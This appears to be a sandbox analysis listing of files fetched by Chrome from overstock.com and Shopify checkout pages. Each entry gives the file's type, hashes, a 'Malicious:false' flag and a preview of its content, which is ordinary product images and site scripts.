                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Madison-Coleen-Modern-Abstract-Rug_fd5ae145-b115-4060-a793-0020244d0395.jpg?v=1728071781&width=320
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....E...*@.@.>5..B.!!.|N. .D.....W.tY.$....1.......w._......w>.t.....E.../..p..?R...p...q.w.k.........}.......3........l...._.}@.n...J.......o.....g.....o.....?.{Z...........7~.z..?.?......+...}u.#.?................<c.{.?............../.......;.6/.......{=.O._......e.A._...z..[.......?........._...O.........q......._....Z.[.....G.......{w...............D.....N.../..z.m...../..y.M=I..M$O....C..../P?.X{'.1...;..S....C....;k.@x...6J....a5.......K.....i...!...13^N<Om....$..}....s%...O....<....>...xd.....:.v...!.G
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1700), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1700
                                                                                                                                                          Entropy (8bit):5.170433763170186
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C27D864A04D2B56969196ED5CAEA0AD4
                                                                                                                                                          SHA1:BDA8A7F8C668D84C68A7E37E4A60F097676811A8
                                                                                                                                                          SHA-256:52749F26510E6538533DDAC12D1705362AF0FFC3A3FEE4D829F2DB0206CF5B0E
                                                                                                                                                          SHA-512:AF306A6D27F22272D1B699371944BEC88D5BC98F835F637B393C625E862FD790C43136426BDD28091FD8CA589F482587AD6505FC5D48278AC95287945FBFAFA2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:(function(t,c){if(typeof c!=="function")return;function n(){var t=null;if(window.braze!==undefined){t=window.braze}else if(window.appboy!==undefined){t=window.appboy}return t}function a(){const t=new URL([...document.getElementsByTagName("script")].map(t=>t.src).find(t=>t.includes("braze-cart-script")));const n=new URLSearchParams(t.search);return Object.fromEntries(n.entries())}function i(t,n){const e=decodeURIComponent(t);const r=e.indexOf(n);if(r!==-1){return e.substring(0,r)}return t}function e(t){var n=t+"=";var e=document.cookie.split(";");for(var r=0;r<e.length;r++){var o=e[r];while(o.charAt(0)==" ")o=o.substring(1,o.length);if(o.indexOf(n)==0)return o.substring(n.length,o.length)}return null}function r(e){const r=i(e,"?key=");const o=localStorage.getItem("cart_token");n().getDeviceId(function(t){if(e!=null&&r!=o){localStorage.setItem("cart_token",r);const n=a();c("https://"+n["sdk_url"]+`/api/v3/shopify/cart_update?cart_token=${r}&device_id=${t}&api_key=${n["api_key"]}&shop=${n
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):43412
                                                                                                                                                          Entropy (8bit):7.9722906359637316
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8CFCA399F6E0809B6BA62AE9B4D66047
                                                                                                                                                          SHA1:BD46D23FC7B3C78B88AE7B28FB5D6C394E5BF25F
                                                                                                                                                          SHA-256:D044077A4CB130178E5E0A1B7CCF6BB80546647450D7EC3A3837A63F6CCF518A
                                                                                                                                                          SHA-512:A50A70E2CA2591AF77611FDA34716065D8270B8A0EE0224E712B594AB2D762267BD8778AC7B7DC10F65F278F81B929FB2BB856CB2233AC5E95329500B5353A0C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@...................................................................................f....l...&"...` .M.u..+......7...;&&Z...K.!.[...J*.B6s}...r..+.G3.?........}....;;.....*1.|.J...Y..N.]..\.,v.+......j.YU.nqUU..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):30304
                                                                                                                                                          Entropy (8bit):7.9798181591839965
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5F04292147791FC7D601D12614BAA193
                                                                                                                                                          SHA1:F0504854AE344EB026A8F5E8BECF2529BDF229FB
                                                                                                                                                          SHA-256:BA7141B3D82384D4EED47304467B48D7FB50F8ADD979F152A0955F2499303149
                                                                                                                                                          SHA-512:7CE871C1D794F52B5B4E4A12421BAF3764553802FDE3764389AA65F9A2C7C6FD89C9825DC2BB05510AA9BAE28221A9C1BE08008E884910C54DFA0C3F8CE4B026
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Enova-Home-Storage-Bins-Fabric-Box-_28Set-of-6_29_61f070b5-a2f3-4a24-8c55-5a02448cd45d.jpg?v=1720024223&width=320
                                                                                                                                                          Preview:RIFFXv..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .s...=...*@.@.>9..C"!!.+6. .....N....._..;".X..Bw..O......(.gug_~..w......k..._.^..?.y.z....G._.O...o.~..G...J.....{.g.3...7.k.7...l= .........)?s.W.[..r.'.H..c..z..s....r.6>..e.W._..,.........O..?._\......zN......o`.l>....'.'./.....................u..........]...k.g......~Z...@.......?............?.?.....6......._............'./.?........[.......?.d......C.e.m.]......h.p...........cv-b.D....]..).6..........eW..{H../}..7S.?`7aSr.;.1..z...(RQM....M....o...0G\.kn>HRr.......f..\.&16...~C0..;..~Yy.....X..;..h.6
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18946
                                                                                                                                                          Entropy (8bit):7.956457155932003
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A8A6EE51D4D49D276FBEEEFBC602795B
                                                                                                                                                          SHA1:4A0C7B8B260A355462899FE40EBD9E139FCDAC24
                                                                                                                                                          SHA-256:C24F0481C903D566BD837ADFCE3FEE7BDBD8170DD4A9165EF349BA8521ED0C48
                                                                                                                                                          SHA-512:E03CE6A4C75F541B67359146A19212FB9C58E01FFFC39DAEFAAD42A08895167BB83F5503F025338DA2C15F5A4C5ECB571A01ED97F37C3DF979BFC0210178D766
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/06272024-MOPS-Category-Jewelry.png?v=1719612969&width=320
                                                                                                                                                          Preview:RIFF.I..WEBPVP8X....8...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.......m.Ir...=."".1U.J.{.k/.GN...l..6...3....Uv..9..%ps~s.@..C..W....H.F..s.. H...b..R.A.f..y..Q3.>.........m.P.....q$....."9.W...&7D>.ki....x.cN....\f..l%. sff{....~R....i.?......)..b...@n..n...M.Q.'"F.0dP....zP...3........hW...G....HR$.DH...c..U?..T.H.-k.>Y.......s..N..g.k]k.m..|o...WW..\*...{*.$$.{.....\.f...3....M^h.|..;.Ix...).m=o.?.m..w.q...X.C...q<../N...f.V...W..u......pk..X..FG.`...!|..'>M...R.}.........c3..83D...3?5..sH]2*.v...F.u0.pF.....{.?...U...jwm......VvA..=.uF0..:..>...'......5...D'..C
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (37527)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):201423
                                                                                                                                                          Entropy (8bit):5.373301065986078
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D32E02B1959C231075E39E0D3F4B4064
                                                                                                                                                          SHA1:7A6FB688CFC55B34DA4045B444D94A3702A3F7F4
                                                                                                                                                          SHA-256:B6D27480E4569B349D40C6AF55CB90623332AC0DB05944EB5F1965A747625AE6
                                                                                                                                                          SHA-512:DF30636A331B7BFD944A210DE78F12E2C75801E2BF689B03C8D41947E7B8160D5186B1C552410E03F08B114FC0FD7B83CA950BCC5BEDD0787DF6F7E540EA9EBC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/vsearch-vendor.2xH_R9Qb.js
                                                                                                                                                          Preview:function bu(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}var Mc={exports:{}},li={},Ic={exports:{}},V={};/**.* @license React.* react.production.min.js.*.* Copyright (c) Facebook, Inc. and its affiliates..*.* This source code is licensed under the MIT license found in the.* LICENSE file in the root directory of this source tree..*/var $l=Symbol.for("react.element"),fp=Symbol.for("react.portal"),dp=Symbol.for("react.fragment"),pp=Symbol.for("react.strict_mode"),mp=Symbol.for("react.profiler"),hp=Symbol.for("react.provider"),vp=Symbol.for("react.context"),yp=Symbol.for("react.forward_ref"),gp=Symbol.for("react.suspense"),wp=Symbol.for("react.memo"),Sp=Symbol.for("react.lazy"),na=Symbol.iterator;function Ep(e){return e===null||typeof e!="object"?null:(e=na&&e[na]||e["@@iterator"],typeof e=="function"?e:null)}var zc={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},Fc=Obj
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3148
                                                                                                                                                          Entropy (8bit):7.5098155424589255
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0234D59A5EB5CA0C1474BDB9525BFDC8
                                                                                                                                                          SHA1:3AC5FBEFA40EAEFE1A560EB922856FCD5537031D
                                                                                                                                                          SHA-256:49CF510D7A111D11D8C8457559D363AA1255F669A4BDE9A4661B0A41DAB4D152
                                                                                                                                                          SHA-512:9ABF281DF941BDB244C201D147E56BFD2B0BFFBC92D3500234751F11B71D8FD850C350B0FD3806333CCADDD37F6140D0E28610F80170F8A0705FD66DF397B1D5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/POLYTRENDS-Altura-Eco-friendly-Round-18_22-Side-Table_b7c6edaa-1fb8-4909-8dbc-1ad5b6db01dd.jpg?v=1717130282&width=320
                                                                                                                                                          Preview:RIFFD...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....P...*@.@.>9..D"!..... ....g.L......l.8/.'..#....xW...>.6J.x......Q.G.~..6^Y...N...5.....C.[.../.?._.?.`=..`..,c.%5C...........~X...MP...,{....c..=..QE..^"%.mO...v9L./n.Z%..5....%2.P.66....*.AS.....m3..t.CT...1...GUIjU...\..E8..&...........y.q....a.B....o.j.7$B...'.1.l..+".?......$.P..C...r.....Ip+4.I7..L+T...A.v..".6.;,{....R.u&Q.V...*Otgi....H..MP....CL.,.:.....-?..,`...DH....o#...'.5.2.j.x...b..&Y,Z.s.s....D..._.~Mm.J........gW..wd.\..Wi..@.sa...............P1.r.~...V..5.]n.M%...;...G..t...b.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):73
                                                                                                                                                          Entropy (8bit):4.656191038630684
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C9D5D489A7792876CEF045A0477F3B32
                                                                                                                                                          SHA1:6891F6B08B0D7D4EF212450F32D97222E05260D8
                                                                                                                                                          SHA-256:760BAA3A18E50032F8447C212D774102B69CBE6E35F368DDC2F2A2C2428493FB
                                                                                                                                                          SHA-512:37CC9C850F410AB8309406F27E1F4231C4B952DEB828093C9F40C9E5D2459E725AEFC6084B5F45DE23DDD56E448141308AED37D57E1389582CA11671C8B14E1E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/StockProblemsLineItemList.CxdIQKjw.css
                                                                                                                                                          Preview:.IDG1X{text-transform:var(--x-global-typography-letter-case, uppercase)}.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):53722
                                                                                                                                                          Entropy (8bit):7.969681125963246
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2523B8CF3C6BD627FEF2D1E1B3B5E521
                                                                                                                                                          SHA1:BB14395595698418569A65CFEBF7C52F6520086A
                                                                                                                                                          SHA-256:BD07F078E3524300938F1DA7C2390DC2FEF46CA00E6C9A9A22430EF08C47B33A
                                                                                                                                                          SHA-512:B7592C5927142DDF5E436B7C3159D64952503F51C4F23BBEF9579A4407751E52675ECDC341AC1C1646D72D62F380307CBA65B33F102A28446C946511E668F068
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.....................................................................................X-.e..((..f7p.P...n....j.I.g..}.iMW7.Z.%..Ly.J.}.:O#I0..Z.5....Qg....FM[.O...z.O[..._.1...P2..W.e%....&......zx*"L....G.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (20235)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):24394
                                                                                                                                                          Entropy (8bit):5.512377842344329
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:17F0A135EB15799FCFFAD2B076BA5A83
                                                                                                                                                          SHA1:FA09FE59E00C70EB47B518445F49EA7BE052F49E
                                                                                                                                                          SHA-256:2C2376365F9C79B9338182A4973F121D6C13168A497818EE8C0B05948E22BBCF
                                                                                                                                                          SHA-512:13FE748AD572F6A0AA42277FE32F15C2D28EAF9D7DBF64ACAC48EA9896C274039D0F52E4A9102035CF09D5BCAE64C364F12D1F65DC171B4DAC30827A306D053B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/vsearch-main.2d4HcZXx.js?v=118034627793632815521729144466
                                                                                                                                                          Preview:const __vite__fileDeps=window.__vite__fileDeps||[],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.(function(){"use strict";try{if(typeof document<"u"){var e=document.createElement("style");e.appendChild(document.createTextNode(`._overlay_1il33_1{position:fixed;top:0;left:0;width:100%;height:100%;z-index:35;display:block;opacity:1;background-color:#fff}._withSideAnimation_1il33_13{transition:left .3s ease}._open_1il33_17{left:0}._close_1il33_21{left:100%}._facetValueLabel_1n921_1{position:relative;display:block;padding-left:28px;color:#252525;font-size:14px;cursor:pointer}._facetValueLabel_1n921_1 input{position:absolute;opacity:0;height:0;width:0}._facetValueLabel_1n921_1:before{content:"";position:absolute;top:50%;left:0;transform:translateY(-50%);width:20px;height:20px;box-sizing:border-box;border-radius:2px;border:1px solid #5a5a5a}._facetValueLabel_1n921_1._isRadio_1n921_27:before{border-radius:50%}._checked_1n921_31:before{border:none;content:url("data:image/svg+xml,%3csvg%20xm
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.707735035267757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7567D653484EA02A88F8284899817AE5
                                                                                                                                                          SHA1:14C7DC327334AB11C0F944AEB33E45EFBC881010
                                                                                                                                                          SHA-256:9F3FFC5784DEF21C9AE232CE129E3E87F83E0A0DDE9E73683E31EDEA35ED8748
                                                                                                                                                          SHA-512:A59F9AC5B9581925A8D5F333A3EDD6CD78F1DBDD79DB8DA7B21C1AC4AC0681E261C6857BD1DBAED9733DFE61FC88D1928282183DB92DBA783413EDC2F376367B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/35168630/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"35168630","rollup":{"average_rating":4.73,"rating_count":262,"review_count":262,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3969)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):282189
                                                                                                                                                          Entropy (8bit):5.547064449638339
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:852CD1E1D540230F7BDD7D763DF6BEB3
                                                                                                                                                          SHA1:1E435FA01FC6AB79DCA711AB113DC1E6B623BE98
                                                                                                                                                          SHA-256:C243606D2200082129F4F6662E581C1F3D502A120A986262815A9B427F9E5520
                                                                                                                                                          SHA-512:A11861DF186B3E829E5BA9D61080B1509B6D5C36CEF2DEECFAEFFDBE1F847ABA1F44BC2160ECE0F7AE33DE11AF3BAEBACEF713B702A5E1EE29548530FBF202B9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-11435964337","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_re
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (2025)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2026
                                                                                                                                                          Entropy (8bit):5.099643199821138
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:25F758A064ECF97C35F1641593B61A1A
                                                                                                                                                          SHA1:E7AD8B9D99822406E3BEB399466294C36255F0B4
                                                                                                                                                          SHA-256:80097CDF13D32B82853A4D6501CB2B9C8F9CFD0913D1841152367539EF862B56
                                                                                                                                                          SHA-512:5CD37AE35CE9C2B5AC2C11421515759C3D1B890DD0A8510735FBF188C7C47C904E62EB01A3DA562748C5468BA6D71879FFA7B473B95725195728C78AC6824A27
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/OnePageModal.BVW5k1eZ.js
                                                                                                                                                          Preview:import{aN as m,as as r,q as l,aO as c,aP as y,aQ as p,aR as v,d as f,aS as g,y as w,a as M,aT as h,aU as E}from"./app.CRtF78CU.js";function A(){const e=m(),{directPaymentErrors:t,paymentLines:n}=r();return l((i,s)=>{if(Object.values(i).every(a=>a==null)&&!s)return;const o=n.peek().find(({method:a})=>a.type==="direct");if(o){const d=o.method.paymentMethodIdentifier;e.write(t.paymentMethodIdentifier,d)}e.write(t.number,i.number?{message:i.number,origin:"client"}:void 0),e.write(t.name,i.name?{message:i.name,origin:"client"}:void 0),e.write(t.expiry,i.expiry?{message:i.expiry,origin:"client"}:void 0),e.write(t.issueDate,i.issue_date?{message:i.issue_date,origin:"client"}:void 0),e.write(t.issueNumber,i.issue_number?{message:i.issue_number,origin:"client"}:void 0),e.write(t.verificationValue,i.verification_value?{message:i.verification_value,origin:"client"}:void 0),e.write(t.general,void 0)},[t,e,n])}function O(){const e=m(),{directPaymentErrors:t}=r();return l(()=>{e.write(t.paymentMetho
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, Unicode text, UTF-8 text, with very long lines (6940)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6943
                                                                                                                                                          Entropy (8bit):5.310500762427844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:EB323CE73FA4AF5E9361B21B14E797F5
                                                                                                                                                          SHA1:068822B6ECA8B66429DFF1D003A305697CD4C4C8
                                                                                                                                                          SHA-256:AC45295ECA5A9ECE1791149DE57D82FE75AD76D04B2979AEBCF4FCC43FC560CA
                                                                                                                                                          SHA-512:DF31C057933446A2DA2DBC6EA022BEC7907376B34F0FAC82DD18DBF18780293D6D1989AA9B523DC0CE403188ABAF0D3F0ED280807E8679F9BD73094C8233DA4D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/context.Cu9sylBE.js
                                                                                                                                                          Preview:import{m as T,eM as M,lP as k,as as N,c1 as m,cy as c,pd as A,hV as h,pe as B,pf as V,T as _,pg as O,ph as I,lY as q,lZ as U,lR as F,h_ as H,a as j,aT as Y,jj as x,e as v,eT as w,dF as G,d4 as z,f7 as $,iQ as R,hU as S,mu as L,pi as J,iT as W,du as X,q as D,iM as Z,dE as Q,dP as K,pj as ee,pk as te,dx as ne,hH as se,dw as ae,id as re,cL as ie,d as y,H as oe,eZ as de,A as le,cN as b,y as E,mm as ue,gm as ce}from"./app.CRtF78CU.js";const pe=[3890849,3850711,5198245];function Me(){const e=T("api-client-id");return e?pe.includes(e):!1}const Ae=()=>{const e=M(),t=k(),n=N().paymentLines.value,s=m(c.userStoredPaymentMethods),r=m(c.selectedPaymentMethod);if(e)return t?.payment?me(r,s):ye(n)},ye=e=>{if(e?.length)return A(e)?"IDEAL":"CREDIT_CARD"},me=(e,t)=>{if(!(!e&&!t.length))return e&&h(e)||B(t)?"IDEAL":"CREDIT_CARD"},ve=()=>{const e=V();return _(()=>e===O.ShopPayExternal?I.ShopPayExternal:I.CheckoutOne,[e])};function Re(){const e=M(),t=q(),n=U(),s=F(["CUSTOM","STORE_CREDIT"]);return!e||t||n|
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17554
                                                                                                                                                          Entropy (8bit):7.951402850889774
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FE3D7DE3750BAD21C2AFB64AD830C44C
                                                                                                                                                          SHA1:CAAC56AE045C52C037E8BD14A12B8A5AA36F82DD
                                                                                                                                                          SHA-256:C585A99629A2BF7D159A0298F794A0AEB0BC401455F7BF67F0442220052AD849
                                                                                                                                                          SHA-512:B0F781D78073886205AF610C0D724D680E5728F945A93DD638815E66B6DEE9C8860F680D37C8DAD97A49448BEA90E71D04C9CC47B24868061D549988E5D5A2A6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/06272024-MOPS-Category-Rug.png?v=1719612969&width=320
                                                                                                                                                          Preview:RIFF.D..WEBPVP8X....8...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.......m.Ir...=."".1U.J.{.k/.GN...l..6...3....Uv..9..%ps~s.@..C..W....H.F..s.. H...b..R.A.f..y..Q3.>.........m.P.....q$....."9.W...&7D>.ki....x.cN....\f..l%. sff{....~R....i.?......)..b...@n..n...M.Q.'"F.0dP....zP...3........hW...G....HR$.DH...c..U?..T.H.-k.>Y.......s..N..g.k]k.m..|o...WW..\*...{*.$$.{.....\.f...3....M^h.|..;.Ix...).m=o.?.m..w.q...X.C...q<../N...f.V...W..u......pk..X..FG.`...!|..'>M...R.}.........c3..83D...3?5..sH]2*.v...F.u0.pF.....{.?...U...jwm......VvA..=.uF0..:..>...'......5...D'..C
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):21318
                                                                                                                                                          Entropy (8bit):7.925929755578391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C699A4AFE20CAEE4BEF8CFB00545C41D
                                                                                                                                                          SHA1:397E9AA308FBAE61F85F8EB7A63C8D50BA3EE21F
                                                                                                                                                          SHA-256:507278AB16D88686DCBCE924256727FF1B7BA7FBDC822EF1B8F17E4C806984AE
                                                                                                                                                          SHA-512:29CA226830D62074B5F935F1E57F113096CE391E79AA8D438BB3D1E859046C90E78B4FC703D07748AA3C973B94AF8068E1BF4923D0A91E661B0F9AE562B65705
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.......................................................................................e...._*..R..y....L`d&$ ...,e......l.f.=^{]Y..`.A.W3.t....9}.jT.G.y.i..!...|....{1......C.1..!...AN,.qC-.d.Z...z....`...XC....?O.
